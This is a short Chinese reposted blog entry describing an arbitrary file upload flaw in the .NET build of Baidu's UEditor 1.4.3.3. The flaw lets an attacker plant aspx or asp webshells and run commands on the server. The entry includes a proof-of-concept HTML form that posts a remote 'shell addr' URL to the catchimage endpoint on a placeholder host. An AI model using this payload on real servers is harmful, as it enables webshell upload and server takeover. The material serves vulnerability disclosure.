UEditor1.4.3.3编辑器漏洞
Posted kbhome
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了UEditor1.4.3.3编辑器漏洞相关的知识,希望对你有一定的参考价值。
百度的UEditor文本编辑器,漏洞是.net版本的,其他的php,jsp,asp版本不受此UEditor的漏洞的影响.。
.net存在任意文件上传,绕过文件格式的限制,在获取远程资源的时候并没有对远程文件的格式进行严格的过滤与判断,攻击者可以上传任意文件包括脚本执行文件,包括aspx脚本木马,asp脚本木马,还可以利用该UEditor漏洞对服务器进行攻击,执行系统命名破坏服务器
版本为1.4.3.3版本
poc:
<form action="www.XXXX.com.cn/controller.ashx?action=catchimage" enctype="application/x-www-form-urlencoded" method="POST">
<p>shell addr:<input type="text" name="source[]"/></p>
<input type="submit" value="submit"/>
</form>
地址:https://www.cnblogs.com/Ivan1ee/p/10198866.html
? https://blog.csdn.net/websinesafe/article/details/82215320
以上是关于UEditor1.4.3.3编辑器漏洞的主要内容,如果未能解决你的问题,请参考以下文章
安全测试 web安全测试 常规安全漏洞 可能存在SQL和JS注入漏洞场景分析。为什么自己没有找到漏洞,哪么可能存在漏洞场景是?SQL注入漏洞修复 JS注入漏洞修复 漏洞存在场景分析和修复示例(代码片段